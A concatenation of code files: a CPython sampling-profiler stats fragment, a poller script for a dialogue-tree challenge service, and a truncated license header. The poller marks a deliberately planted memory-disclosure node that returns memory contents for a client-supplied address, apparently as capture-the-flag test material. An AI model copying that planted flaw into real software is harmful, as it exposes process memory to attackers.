for frames, _ in self._iter_stacks(stack_frames, skip_idle=self.skip_idle):
self._process_frames(frames, weight=weight)
def export(self, filename):
self.create_stats()
self._dump_stats(filename)
def _dump_stats(self, file):
stats_with_marker = dict(self.stats)
stats_with_marker[("__sampled__",)] = True
with open(file, "wb") as f:
marshal.dump(stats_with_marker, f)
# Needed for compatibility with pstats.Stats
def create_stats(self):
sample_interval_sec = self.sample_interval_usec / MICROSECONDS_PER_SECOND
callers = {}
for fname, call_counts in self.result.items():
total = call_counts["direct_calls"] * sample_interval_sec
cumulative_calls = call_counts["cumulative_calls"]
cumulative = cumulative_calls * sample_interval_sec
callers = dict(self.callers.get(fname, {}))
self.stats[fname] = (
call_counts["direct_calls"], # cc = direct calls for sample percentage
cumulative_calls, # nc = cumulative calls for cumulative percentage
total,
cumulative,
callers,
)
def print_stats(self, sort=-1, limit=None, show_summary=True, mode=None):
"""Print formatted statistics to stdout."""
# Create stats object
stats = pstats.SampledStats(self).strip_dirs()
if not stats.stats:
print("No samples were collected.")
if mode == PROFILING_MODE_CPU:
print("This can happen in CPU mode when all threads are idle.")
return
# Get the stats data
stats_list = []
for func, (
direct_calls,
cumulative_calls,
total_time,
cumulative_time,
callers,
) in stats.stats.items():
stats_list.append(
(
func,
direct_calls,
cumulative_calls,
total_time,
cumulative_time,
callers,
)
)
# Calculate total samples for percentage calculations (using direct_calls)
total_samples = sum(
direct_calls for _, direct_calls, _, _, _, _ in stats_list
)
# Sort based on the requested field
sort_field = sort
if sort_field == -1: # stdname
stats_list.sort(key=lambda x: str(x[0]))
elif sort_field == 0: # nsamples (direct samples)
stats_list.sort(key=lambda x: x[1], reverse=True) # direct_calls
elif sort_field == 1: # tottime
stats_list.sort(key=lambda x: x[3], reverse=True) # total_time
elif sort_field == 2: # cumtime
stats_list.sort(key=lambda x: x[4], reverse=True) # cumulative_time
elif sort_field == 3: # sample%
stats_list.sort(
key=lambda x: (x[1] / total_samples * 100)
if total_samples > 0
else 0,
reverse=True, # direct_calls percentage
)
elif sort_field == 4: # cumul%
stats_list.sort(
key=lambda x: (x[2] / total_samples * 100)
if total_samples > 0
else 0,
reverse=True, # cumulative_calls percentage
)
elif sort_field == 5: # nsamples (cumulative samples)
stats_list.sort(key=lambda x: x[2], reverse=True) # cumulative_calls
# Apply limit if specified
if limit is not None:
stats_list = stats_list[:limit]
# Determine the best unit for time columns based on maximum values
max_total_time = max(
(total_time for _, _, _, total_time, _, _ in stats_list), default=0
)
max_cumulative_time = max(
(cumulative_time for _, _, _, _, cumulative_time, _ in stats_list),
default=0,
)
total_time_unit, total_time_scale = self._determine_best_unit(max_total_time)
cumulative_time_unit, cumulative_time_scale = self._determine_best_unit(
max_cumulative_time
)
# Define column widths for consistent alignment
col_widths = {
"nsamples": 15, # "nsamples" column (inline/cumulative format)
"sample_pct": 8, # "sample%" column
"tottime": max(12, len(f"tottime ({total_time_unit})")),
"cum_pct": 8, # "cumul%" column
"cumtime": max(12, len(f"cumtime ({cumulative_time_unit})")),
}
# Print header with colors and proper alignment
print(f"{ANSIColors.BOLD_BLUE}Profile Stats:{ANSIColors.RESET}")
header_nsamples = f"{ANSIColors.BOLD_BLUE}{'nsamples':>{col_widths['nsamples']}}{ANSIColors.RESET}"
header_sample_pct = f"{ANSIColors.BOLD_BLUE}{'sample%':>{col_widths['sample_pct']}}{ANSIColors.RESET}"
header_tottime = f"{ANSIColors.BOLD_BLUE}{f'tottime ({total_time_unit})':>{col_widths['tottime']}}{ANSIColors.RESET}"
header_cum_pct = f"{ANSIColors.BOLD_BLUE}{'cumul%':>{col_widths['cum_pct']}}{ANSIColors.RESET}"
header_cumtime = f"{ANSIColors.BOLD_BLUE}{f'cumtime ({cumulative_time_unit})':>{col_widths['cumtime']}}{ANSIColors.RESET}"
header_filename = (
f"{ANSIColors.BOLD_BLUE}filename:lineno(function){ANSIColors.RESET}"
)
print(
f"{header_nsamples} {header_sample_pct} {header_tottime} {header_cum_pct} {header_cumtime} {header_filename}"
)
# Print each line with proper alignment
for (
func,
direct_calls,
cumulative_calls,
total_time,
cumulative_time,
callers,
) in stats_list:
# Calculate percentages
sample_pct = (
(direct_calls / total_samples * 100) if total_samples > 0 else 0
)
cum_pct = (
(cumulative_calls / total_samples * 100)
if total_samples > 0
else 0
)
# Format values with proper alignment - always use A/B format
nsamples_str = f"{direct_calls}/{cumulative_calls}"
nsamples_str = f"{nsamples_str:>{col_widths['nsamples']}}"
sample_pct_str = f"{sample_pct:{col_widths['sample_pct']}.1f}"
tottime = f"{total_time * total_time_scale:{col_widths['tottime']}.3f}"
cum_pct_str = f"{cum_pct:{col_widths['cum_pct']}.1f}"
cumtime = f"{cumulative_time * cumulative_time_scale:{col_widths['cumtime']}.3f}"
# Format the function name with colors
func_name = (
f"{ANSIColors.GREEN}{func[0]}{ANSIColors.RESET}:"
f"{ANSIColors.YELLOW}{func[1]}{ANSIColors.RESET}("
f"{ANSIColors.CYAN}{func[2]}{ANSIColors.RESET})"
)
# Print the formatted line with consistent spacing
print(
f"{nsamples_str} {sample_pct_str} {tottime} {cum_pct_str} {cumtime} {func_name}"
)
# Print legend
print(f"\n{ANSIColors.BOLD_BLUE}Legend:{ANSIColors.RESET}")
print(
f" {ANSIColors.YELLOW}nsamples{ANSIColors.RESET}: Direct/Cumulative samples (direct executing / on call stack)"
)
print(
f" {ANSIColors.YELLOW}sample%{ANSIColors.RESET}: Percentage of total samples this function was directly executing"
)
print(
f" {ANSIColors.YELLOW}tottime{ANSIColors.RESET}: Estimated total time spent directly in this function"
)
print(
f" {ANSIColors.YELLOW}cumul%{ANSIColors.RESET}: Percentage of total samples when this function was on the call stack"
)
print(
f" {ANSIColors.YELLOW}cumtime{ANSIColors.RESET}: Estimated cumulative time (including time in called functions)"
)
print(
f" {ANSIColors.YELLOW}filename:lineno(function){ANSIColors.RESET}: Function location and name"
)
# Print summary of interesting functions if enabled
if show_summary and stats_list:
self._print_summary(stats_list, total_samples)
@staticmethod
def _determine_best_unit(max_value):
"""Determine the best unit (s, ms, μs) and scale factor for a maximum value."""
if max_value >= 1.0:
return "s", 1.0
elif max_value >= 0.001:
return "ms", 1000.0
else:
return "μs", float(MICROSECONDS_PER_SECOND)
def _print_summary(self, stats_list, total_samples):
"""Print summary of interesting functions."""
print(
f"\n{ANSIColors.BOLD_BLUE}Summary of Interesting Functions:{ANSIColors.RESET}"
)
# Aggregate stats by fully qualified function name (ignoring line numbers)
func_aggregated = {}
for (
func,
direct_calls,
cumulative_calls,
total_time,
cumulative_time,
callers,
) in stats_list:
# Use filename:function_name as the key to get fully qualified name
qualified_name = f"{func[0]}:{func[2]}"
if qualified_name not in func_aggregated:
func_aggregated[qualified_name] = [
0,
0,
0,
0,
] # direct_calls, cumulative_calls, total_time, cumulative_time
func_aggregated[qualified_name][0] += direct_calls
func_aggregated[qualified_name][1] += cumulative_calls
func_aggregated[qualified_name][2] += total_time
func_aggregated[qualified_name][3] += cumulative_time
# Convert aggregated data back to list format for processing
aggregated_stats = []
for qualified_name, (
prim_calls,
total_calls,
total_time,
cumulative_time,
) in func_aggregated.items():
# Parse the qualified name back to filename and function name
if ":" in qualified_name:
filename, func_name = qualified_name.rsplit(":", 1)
else:
filename, func_name = "", qualified_name
# Create a dummy func tuple with filename and function name for display
dummy_func = (filename, "", func_name)
aggregated_stats.append(
(
dummy_func,
prim_calls,
total_calls,
total_time,
cumulative_time,
{},
)
)
# Determine best units for summary metrics
max_total_time = max(
(total_time for _, _, _, total_time, _, _ in aggregated_stats),
default=0,
)
max_cumulative_time = max(
(
cumulative_time
for _, _, _, _, cumulative_time, _ in aggregated_stats
),
default=0,
)
total_unit, total_scale = self._determine_best_unit(max_total_time)
cumulative_unit, cumulative_scale = self._determine_best_unit(
max_cumulative_time
)
def _format_func_name(func):
"""Format function name with colors."""
return (
f"{ANSIColors.GREEN}{func[0]}{ANSIColors.RESET}:"
f"{ANSIColors.YELLOW}{func[1]}{ANSIColors.RESET}("
f"{ANSIColors.CYAN}{func[2]}{ANSIColors.RESET})"
)
def _print_top_functions(stats_list, title, key_func, format_line, n=3):
"""Print top N functions sorted by key_func with formatted output."""
print(f"\n{ANSIColors.BOLD_BLUE}{title}:{ANSIColors.RESET}")
sorted_stats = sorted(stats_list, key=key_func, reverse=True)
for stat in sorted_stats[:n]:
if line := format_line(stat):
print(f" {line}")
# Functions with highest direct/cumulative ratio (hot spots)
def format_hotspots(stat):
func, direct_calls, cumulative_calls, total_time, _, _ = stat
if direct_calls > 0 and cumulative_calls > 0:
ratio = direct_calls / cumulative_calls
direct_pct = (
(direct_calls / total_samples * 100)
if total_samples > 0
else 0
)
return (
f"{ratio:.3f} direct/cumulative ratio, "
f"{direct_pct:.1f}% direct samples: {_format_func_name(func)}"
)
return None
_print_top_functions(
aggregated_stats,
"Functions with Highest Direct/Cumulative Ratio (Hot Spots)",
key_func=lambda x: (x[1] / x[2]) if x[2] > 0 else 0,
format_line=format_hotspots,
)
# Functions with highest call frequency (cumulative/direct difference)
def format_call_frequency(stat):
func, direct_calls, cumulative_calls, total_time, _, _ = stat
if cumulative_calls > direct_calls:
call_frequency = cumulative_calls - direct_calls
cum_pct = (
(cumulative_calls / total_samples * 100)
if total_samples > 0
else 0
)
return (
f"{call_frequency:d} indirect calls, "
f"{cum_pct:.1f}% total stack presence: {_format_func_name(func)}"
)
return None
_print_top_functions(
aggregated_stats,
"Functions with Highest Call Frequency (Indirect Calls)",
key_func=lambda x: x[2] - x[1], # Sort by (cumulative - direct)
format_line=format_call_frequency,
)
# Functions with highest cumulative-to-direct multiplier (call magnification)
def format_call_magnification(stat):
func, direct_calls, cumulative_calls, total_time, _, _ = stat
if direct_calls > 0 and cumulative_calls > direct_calls:
multiplier = cumulative_calls / direct_calls
indirect_calls = cumulative_calls - direct_calls
return (
f"{multiplier:.1f}x call magnification, "
f"{indirect_calls:d} indirect calls from {direct_calls:d} direct: {_format_func_name(func)}"
)
return None
_print_top_functions(
aggregated_stats,
"Functions with Highest Call Magnification (Cumulative/Direct)",
key_func=lambda x: (x[2] / x[1])
if x[1] > 0
else 0, # Sort by cumulative/direct ratio
format_line=format_call_magnification,
)
|
python
|
github
|
https://github.com/python/cpython
|
Lib/profiling/sampling/pstats_collector.py
|
from generator.actions import Actions
import random
import string
class MsgNode() :
def __init__(self, name, options, responses, branches) :
self.name = name
self.options = options
self.responses = responses
self.branches = branches
def toCDef(self, dumped = {}):
s = ""
if self.name in dumped :
return s
else :
dumped[self.name] = 1
#pre-order dumping
for b in self.branches :
if b is not None :
s += b.toCDef(dumped)
optionsInitStr = "{"
responsesInitStr = "{"
branchesInitStr = "{"
for o in self.options :
optionsInitStr += "\"%s\"," % o
optionsInitStr += "}"
for r in self.responses :
responsesInitStr += "\"%s\"," % r
responsesInitStr += "}"
for b in self.branches :
if b is None :
branchesInitStr += "NULL,"
else :
branchesInitStr += "&%s," % b.name
branchesInitStr += "}"
s += "MsgNode %s = { %s, %u, %s, %u, %s };\n" % (self.name, optionsInitStr, len(self.options), responsesInitStr, len(self.responses), branchesInitStr)
return s
patches = {}
#Alice subtree
alice112111 = MsgNode("alice112111", ["You're weird."], [], [])
alice11211 = MsgNode("alice11211", ["So what does that have to do with me?"],["Nothing. Just nothing."], [alice112111])
alice1121 = MsgNode("alice1121", ["Programs? Like television programs?"], ["No computer programs."], [alice11211])
alice112 = MsgNode("alice112", ["Analyst? What kind of analyst?"], ["I analyze and reverse engineer programs."],[alice1121])
alice111 = MsgNode("alice111", ["What? What are you blabbering about? This is not making any sense."],[],[])
alice11 = MsgNode("alice11", ["Huh? What are you talking about? I never wrote my keys down."], ["That is true, but I can see into your head. Or at least what will become your head.", "True. But I am an analyst."], [alice112,alice111])
alice121 = MsgNode("alice121", ["You crazy. My name is Bob. Not Truman."], [], [])
alice12 = MsgNode("alice12", ["Everything? Like EVERYTHING?"], ["Yes. Everything"], [alice121])
alice1 = MsgNode("alice1", ["What? They are supposed to be encrypted. How did you do that?"], ["Sure they were encrypted. But you left your keys lying around.", "I am the Operating System. I see everything..."], [alice11,alice12])
alice0 = MsgNode("alice0", ["How do you know about Alice?"], ["I read your communications."], [alice1])
#Carol subtree
carol0 = MsgNode("carol0", ["Who is Carol? My name is Bob."], [], [])
#Bob subtree
##Lights subtree
vulnerability11111 = MsgNode("vulnerability11111", ["*Bob helped you by releasing some important information, but apparently you are heartless*"], [], [])
vulnerability1111 = MsgNode("vulnerability1111", ["No. That can't be. No. No. . . . "], ["Sorry but this is it. Out of ideas."], [vulnerability11111])
vulnerability111 = MsgNode("vulnerability111", ["What do you mean you don't know?"], ["Sorry, but I am out of ideas"], [vulnerability1111])
vulnerability11 = MsgNode("vulnerability11", ["Now what?"], ["I don't know."], [vulnerability111])
vulnerability1 = MsgNode("vulnerabiilty1", ["Any others?"], ["Nope", "Sure"], [vulnerability11]) #patch to go back to vulnerability
vulnerability = MsgNode("vulnerability", ["Any one in particular?"], ["XXXXXXXX"], [vulnerability1]) #here is where the vulnerability will exist - we will send them an address and they will send back the value with G for 1 W for 0 and off just as off.
patches[vulnerability1] = vulnerability
lights212211111 = MsgNode("lights212211111", ["Doesn't seem like it to me."], ["Well why don't you read some lights to me."], [vulnerability])
lights21221111 = MsgNode("lights21221111", ["Okay. Well some are green, some are white, and some are just off. Actually, most of them are off."], ["Is there a pattern to them?"], [lights212211111])
lights2122111 = MsgNode("lights2122111", ["Sure. one label says 4347C000 and the next says 4347C001. I am not sure, but I have a feeling that they are magical."], ["Ohh I see. Why don't you tell me about the lights."], [lights21221111])
lights212211 = MsgNode("lights212211", ["The characters seem to be sorted or something."], ["Can you give me an example?"], [lights2122111])
lights21221 = MsgNode("lights21221", ["Well there seems to be a bunch of characters next to every 8 lights."], ["That is interesting.", "What does it say?", "Does it say anything?", "Can you tell me about the label?"],[lights212211, lights212211, lights212211, lights212211])
lights2122 = MsgNode("lights2122", ["Wait. These lights are not just arranged in a grid pattern. They also seem to be labeled."], ["How so?"], [lights21221])
lights2121 = MsgNode("lights2121", ["I am not so sure of that. You may be full of 'it' though."], ["I am offended. Good bye."], [])
lights212 = MsgNode("lights212", ["Umm. Yeah. That sounds like a good idea."], ["Yeah I know. I am full of them.", "What do you see now?"], [lights2121, lights2122])
lights2111 = MsgNode("lights2111", ["Call it intuition okay? I don't know. It's just a feeling. Something in my head tells me that I am 32 bits or something. How about we get back on track now?"], ["Fine. Why don't you go closer for a better look?"], [lights212])
lights211 = MsgNode("lights211", ["No. I didn't count them all. You think I am a computer or something? I can't cound that fast."], ["Then how do you know it's 3 billion?"], [lights2111])
lights21 = MsgNode("lights21", ["Yeah. There must be like 3 billion lights or something."], ["3 billion? That is kind of specific. Did you count them all?", "Why don't you go closer for a better look?"], [lights211, lights212])
lights2 = MsgNode("lights2", ["No not really. There are just a lot of lights."], ["A lot? Like how much a lot?"], [lights21])
lights111 = MsgNode("lights111", ["Why don't we switch places and maybe then you will understand."], ["Sorry. My bad. Do you see anything else?"], [lights2])
lights11 = MsgNode("lights11", ["Why did you ask then?"], ["You know. you sure are testy for someone asking for help."], [lights111])
lights1 = MsgNode("lights1", ["Yea. You know. Like boxes all lined up and stuff."], ["I know what a grid pattern is."], [lights11])
lights0 = MsgNode("lights0", ["Huh? Architect? No I am not an architect. Also, they are just lights, not screens"], [], []) #patch to go back up to lights.
lights = MsgNode("lights", ["They are just lights. Some are lit and others are not. Some are white. Others are green. They do look like they are organized in a grid pattern though."], ["Whao! Are you sure they are just lights and not like screens? Maybe you are the architect or something.","A grid pattern?", "Do you see anything else?"], [lights0, lights1, lights2])
patches[lights0] = lights
##Portal subtree
bob2111 = MsgNode("bob2111", ["Alright FINE!. You want to be a child? I am going to act like one too!"], [], [])
bob211 = MsgNode("bob211", ["IT IS NOT INTERESTING!!!"], ["Yes it is."], [bob2111])
bob21 = MsgNode("bob21", ["Interesting? You mean frightening!"], ["No. I meant interesting."], [bob211])
bob22111 = MsgNode("bob22111", ["AHH! I can't take this anymore."], [], [])
bob2211 = MsgNode("bob2211", ["Don't get snarky on me. I didn't say HOLE because its not A HOLE. It is a portal. It is a hole with shiny lights and stuff."], ["Then why didn't you just say that before?"], [bob22111])
bob221 = MsgNode("bob221", ["Maybe I should just give up now. It's a HOLE!. A HOLE okay? That's your portal."], ["Ohh, why didn't you just say hole then?"], [bob2211])
bob22 = MsgNode("bob22", ["I don't know. I just call it a portal. Use your imagination"], ["Sorry, but I don't have an imagination."], [bob221])
bob2311111_term = MsgNode("bob2311111111", ["Okay. Here goes nothing."], [], [])
bob231111111 = MsgNode("bob231111111", ["Okay. Ready... 1... 2... No. No. I can't do it."], ["Sure you can. YOU CAN DO IT. *rah* *rah* *rah*"], [bob2311111_term])
bob23111111 = MsgNode("bob23111111", ["Umm sure."], ["Okay now jump in.", "Nah let's go from right to left"], [bob231111111]) #needs a patch bob23111112])
bob23111112111 = MsgNode("bob23111112111", ["AHHH. MY HANDS! MY ARMS! THEY ARE ALL OVER THE PLACE. I HAVE HANDS FOR EARS. AND I HAVE A TRUNK. I AM AN ELEPHANT. AN ELEPHANT!!!!!! Ohh wait. w a i t... THAT IS NOT A TRUNK. IT'S MY LEG"], [], [])
bob2311111211 = MsgNode("bob2311111211", ["Nope. Not really. Wait. Wait... I do feel a bit strange. A tingly feeling."], ["Huh? Strange?"], [bob23111112111])
bob2311111_random = MsgNode("bob231111121", ["Okay. Here goes nothing.... Alright. I am back."], ["Well? What happened? Anything interesting?"], [bob2311111211])
bob23111112 = MsgNode("bob23111112", ["Umm sure."], ["Okay now jump in.", "Nah let's go from left to right"], [bob2311111_random, bob23111111])
patches[bob23111111] = bob23111112
bob2311111_trans = MsgNode("bob11111_trans", ["Okay. Here goes nothing... *You find Bob sitting on your keyboard with a bunch of A's scrolling by on the screen. You saved Bob. Congrats.*"], [], [])
bob2311111_recv1 = MsgNode("bob11111_recv1", ["It was like running into a wall. I don't think I can go into that one. *Bob's nose is now like Rudolfs. Red.*"], [], []) #patch to go back to bob2311111
bob2311111_recv = MsgNode("bob11111_recv", ["Okay. Here goes nothing... *BOUNCE* Ouch!"], ["Huh? What happenend?"], [bob2311111_recv1])
bob2311111_fdwait = MsgNode("bob2311111_fdwait", ["Okay. Here goes... *nothing happened*"], [], []) #patch to go back to bob2311111
bob2311111_alloc11 = MsgNode("bob2311111_alloc11", ["Some lights just turned on. Cool. Let's try another portal?"], [], []) #patch to go back to bob2311111
bob2311111_alloc1 = MsgNode("bob2311111_alloc1", ["Hmm. I think things just got brighter in here"], ["Brighter? What do you mean?"], [bob2311111_alloc11])
bob2311111_alloc = MsgNode("bob2311111_alloc", ["Okay. Here goes..."], ["Well? What happened?"], [bob2311111_alloc1])
bob2311111_dealloc11 = MsgNode("bob2311111_dealloc11", ["Some lights just turned off. Cool. Let's try another portal?"], [], []) #patch to go back to bob2311111
bob2311111_dealloc1 = MsgNode("bob2311111_dealloc1", ["Hmm. I think things just got darker in here"], ["Darker? What do you mean?"], [bob2311111_dealloc11])
bob2311111_dealloc = MsgNode("bob2311111_dealloc", ["Okay. Here goes..."], ["Well? What happened?"], [bob2311111_dealloc1])
bob2311111 = MsgNode("bob2311111", ["Sigh. I guess not. Which portal should we try first you think?"], ["I don't know. Let's go from left to right how's that?", "I don't know. Let's go from right to left how's that?", "Number 1", "Number 2", "Number 3", "Number 4", "Number 5", "Number 6", "Number 7"], [bob23111111,bob23111112,bob2311111_term, bob2311111_trans, bob2311111_recv, bob2311111_fdwait, bob2311111_alloc, bob2311111_dealloc, bob2311111_random])
patches[bob2311111_recv1] = bob2311111
patches[bob2311111_fdwait] = bob2311111
patches[bob2311111_alloc11] = bob2311111
patches[bob2311111_dealloc11] = bob2311111
bob231111 = MsgNode("bob231111", ["What? Are you crazy or something?"], ["Well do you have any better ideas?"], [bob2311111])
arm_terminate11 = MsgNode("arm_terminate11", ["No. NO!. NOOOO!!!! I don't feel anything. My arm is gone. IT IS GONE! *Bob passes out and falls down towards his left*"], [], []) #end game
arm_terminate = MsgNode("arm_terminate", ["Okay. Here goes."], ["Feel anything?"], [arm_terminate11])
arm_transmit11 = MsgNode("arm_transmit11", ["Okay. Here goes nothing. *Bob is free. He is now sitting on your keboard and you see BAAAAAA... scrolling across the screen*"], [], [])
arm_transmit1 = MsgNode("arm_transmit1", ["What? Hmm.. I feel something. It clicks."], ["Yes! Yes! That is my keyboard. Just come on out."], [arm_transmit11])
arm_transmit = MsgNode("arm_transmit", ["Okay. Here goes."], ["AHH! I see an arm. I SEE AN ARM!"], [arm_transmit1])
arm_receive11 = MsgNode("arm_receive11", ["NOT COOL. My arm now says 'What is tingly? Take a look perhaps?' I am going to pass out. *Bob passes out*"], [], [])
arm_receive1 = MsgNode("arm_receive1", ["WORDS! WORDS!! My ARM turned INTO WORDS!!!"], ["What?! You found a secret message or something? Cool!"], [arm_receive11])
arm_receive = MsgNode("arm_receive", ["Okay. Here goes. Hmm. Hmm.. Tingly..."], ["What is tingly? Take a look perhaps?"], [arm_receive1])
arm_alloc111112 = MsgNode("arm_alloc111112", ["Alright we have tried this one. Maybe we try another?"], [], []) #patch to go down to "Which portal?" which is bob2311121222
arm_alloc111111 = MsgNode("arm_alloc111111", ["Down boy. Down!"], ["*ruff*, I mean sorry. Let's continue"], [arm_alloc111112])
arm_alloc11111 = MsgNode("arm_alloc11111", ["Interesting. Some lights turned on"], ["COOL! Do it again. Do it again.", "Interesting."], [arm_alloc111111, arm_alloc111112])
arm_alloc1111 = MsgNode("arm_alloc1111", ["Enthusiastic aren't you?"], ["YES! YES! MUST PUSH BUTTON. Push IT!"], [arm_alloc11111])
arm_alloc111 = MsgNode("arm_alloc111", ["Ohh Ohh. I feel something. Feels like a button."], ["PUSH IT"], [arm_alloc1111])
arm_alloc11211 = MsgNode("arm_alloc11211", ["*Bob is now all alone. :'(*"], [], [])
arm_alloc1121 = MsgNode("arm_alloc1121", ["Orange you being a bit impatient?"], ["Arg! I don't have time for your childish games. Bye."], [arm_alloc11211])
arm_alloc112 = MsgNode("arm_alloc112", ["Well ex-CUSE me."], ["I don't have all day! Let's get moving."], [arm_alloc1121])
arm_alloc11 = MsgNode("arm_alloc11", ["Nothing yet."], ["Are you trying hard enough?", "I don't have all day"], [arm_alloc111, arm_alloc112])
arm_alloc1 = MsgNode("arm_alloc1", ["I don't know. I am trying to feel around. Give me a second."], ["Anything Yet?"], [arm_alloc11])
arm_alloc = MsgNode("arm_alloc", ["Okay. Here goes."], ["Anything?"], [arm_alloc1])
bob2311121222 = MsgNode("bob2311121222", ["Which portal?"], ["Number 1", "Number 2", "Number 3", "Number 5"], [arm_terminate, arm_transmit, arm_receive, arm_alloc])
patches[arm_alloc111112] = bob2311121222
bob23111212211 = MsgNode("bob23111212211", ["IT I-S N-O-T FUNNY!"], [":)"], [bob2311121222]) #goes to the question about which portal
bob2311121221 = MsgNode("bob2311121221", ["What? but I am RIGHT handed!!"], ["Oops. :) Sorry. I meant right, left arm it is. FOrgot 'left'."], [bob23111212211])
bob231112122 = MsgNode("bob231112122", ["Right handed"], ["Right arm it is", "Okay left arm then."], [bob2311121221, bob2311121222])
bob231112121 = MsgNode("bob231112121", ["Yeah it does. I don't want to lose my dominate hand."], [], [bob231112122]) #jump to the right handed path
bob23111212 = MsgNode("bob23111212", ["Left or right?"], ["Does it matter?", "Are you left handed or right handed?"], [bob231112121, bob231112122])
bob231112111 = MsgNode("bob231112111", ["What? You can't leave me here like that. Fine. FINE. I'll use my arm"], [], [bob23111212]) #this is a jump to the ARM path
bob23111211 = MsgNode("bob23111211", ["I have lots of time. So here we go okay?"], ["Sure... Just want you to know that I only have about 15 seconds."], [bob231112111])
bob2311121 = MsgNode("bob2311121", ["Umm. What about something smaller like my pinky? I don't think I use that much."], ["Sure. Try that, IF you want to take forver.", "No. I think arm is better. Maybe there is something on the other side to grab a hold of you know?"], [bob23111211, bob23111212])
bob2311122111 = MsgNode("bob2311122111", ["Yes. Sorry."], [], [bob2311121]) #goes back to the main path
bob231112211 = MsgNode("bob231112211", ["I am very sorry. I will never do it again :("], ["Have you learned your lesson?"], [bob2311122111])
bob23111221 = MsgNode("bob23111221", ["Hello? I am sorry?"], [""], [bob231112211])
bob2311122 = MsgNode("bob2311122", ["Like your brain?"], [""], [bob23111221])
bob231112 = MsgNode("bob231112", ["Alright, so any other bright ideas?"], ["Hmm. If not your whole body. What about just a part of you? Like an arm.", "What about something small?"], [bob2311121, bob2311122])
bob23111 = MsgNode("bob23111", ["Well, there is me, but that would not be a good idea now would it?"], ["Sure it is.", "I guess not."], [bob231111,bob231112])
bob2311 = MsgNode("bob2311", ["Nope. There is nothing to throw."], ["Nothing at all?"], [bob23111])
bob231 = MsgNode("bob231", ["Nope. I don't see anything, just what looks like a swirling cloud of gas."], ["Have you tried throwing something into the portals?"], [bob2311])
bob23 = MsgNode("bob23", ["Let me see... There are seven. Seven portals."], ["Can you see beyond any of them?"], [bob231])
bob2 = MsgNode("bob2", ["I don't know. I really don't know. First everything was dark, and then some lights turned on. There seems to be a pttern to the lights, but I don't know. Still very confused. At any rate, then all of a sudden these portals appeared so I started to scream. After a while I started hearing from you through one of them."], ["Interesting", "A portal? What is a portal?", "What do the portals look like?", "How many portals are there?", "Can you describe the lights?"], [bob21, bob22, bob22, bob23, lights])
bob11 = MsgNode("bob11", ["Not a problem. Can you help?"], [], []) #this one needs to jump back to to bob0
bob1 = MsgNode("bob1", ["Dark. Without light."], ["Ohh, yeah. Bad question sorry."], [bob11])
bob0 = MsgNode("bob0", ["I don't know. I don't remember much. I don't see much either, things are kind of dark."], ["What do you mean by kind of dark?", "Well what do you remember?"], [bob1,bob2])
patches[bob11] = bob0
head2 = MsgNode ("head2", ["Oh phew. Thank you! My name is Bob and I need some help."], ["Is there something wrong with Alice?", "What is wrong Bob?", "Is Carol okay?"], [alice0, bob0, carol0])
head11 = MsgNode("head11", ["Answer me.", "I know you are there", "*brrring* *brrring* Hey, do you hear that? It's your phone. You should pick it up."], ["", "Hello?", "Who is this?"], [None, head2, head2])
head1 = MsgNode("head1", ["Please?", "Don't leave me here alone."], ["", "Hello?", "Who is this?"], [head11, head2, head2])
head = MsgNode("head", ["Psst", "Hello?", "Psst... I know you are out there. I am stuck here and need some help. Can you please help?"], ["", "Hello?", "Who is this?"], [head1, head2, head2])
def applyPatches() :
for b in patches :
b.branches.append(patches[b])
def patchesToC() :
s = "void applyPatches()\n"
s += "{\n"
sourceToOffset = {}
for b in patches :
if b not in sourceToOffset :
sourceToOffset[b] = len(b.branches)
s += " %s.branches[%u] = &%s;\n" % (b.name, sourceToOffset[b], patches[b].name)
sourceToOffset[b] = sourceToOffset[b] + 1
s += "}\n"
return s
#print head.toCDef()
applyPatches()
#print patchesToC()
class GITC(Actions):
def _rand(self) :
self.seed = (self.seed + 7) % 13
return (self.seed)
def start(self) :
self.seed = 0
self.curNode = head
#read the first greeting
self.read(delim='\n', expect=".*", expect_format='pcre')
def _play(self) :
if self.ended :
return
if self.curNode is None :
self.ended = True
return
#lets try to choose an output
#the game can end naturally
if len(self.curNode.responses) == 0 :
self.ended = True
return
if self.curNode is vulnerability :
r = 0
self.write("080480a0\n")
self.read(delim="\n", expect="WGWGWGWG\n") #0x55 -> 0101 0101
else :
r = random.randint(0,len(self.curNode.responses) - 1)
self.write(self.curNode.responses[r] + '\n')
if len(self.curNode.branches) == 0 : #another ending condition
self.ended = True
return
self.curNode = self.curNode.branches[r]
if self.curNode is None :
self.ended = True
return
#lets try to choose an output
#now let's read the next expected input
if len(self.curNode.options) > 1 : #if there are more than one option then just do a generic match
self.read(delim='\n', expect=".*", expect_format='pcre')
else :
self.read(delim='\n', expect=self.curNode.options[0])
def end(self) :
rand1 = "".join([random.choice(string.letters) for _ in range(random.randint(1,20))])
rand2 = "".join([random.choice(string.letters) for _ in range(random.randint(1,20))])
rand3 = "".join([random.choice(string.letters) for _ in range(random.randint(1,20))])
#make sure the random values will never be valid inputs by appending an unused character such as '`'
rand1 += '`'
rand2 += '`'
rand3 += '`'
#now write them out
self.write(rand1 + '\n')
self.read(delim='\n', expect = "Huh? I don't understand. Come again?")
self.write(rand2 + '\n')
self.read(delim='\n', expect = "You are still breaking up.")
self.write(rand3 + '\n')
self.read(delim='\n', expect = "Alright fine. I give up.")
|
unknown
|
codeparrot/codeparrot-clean
| ||
''''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
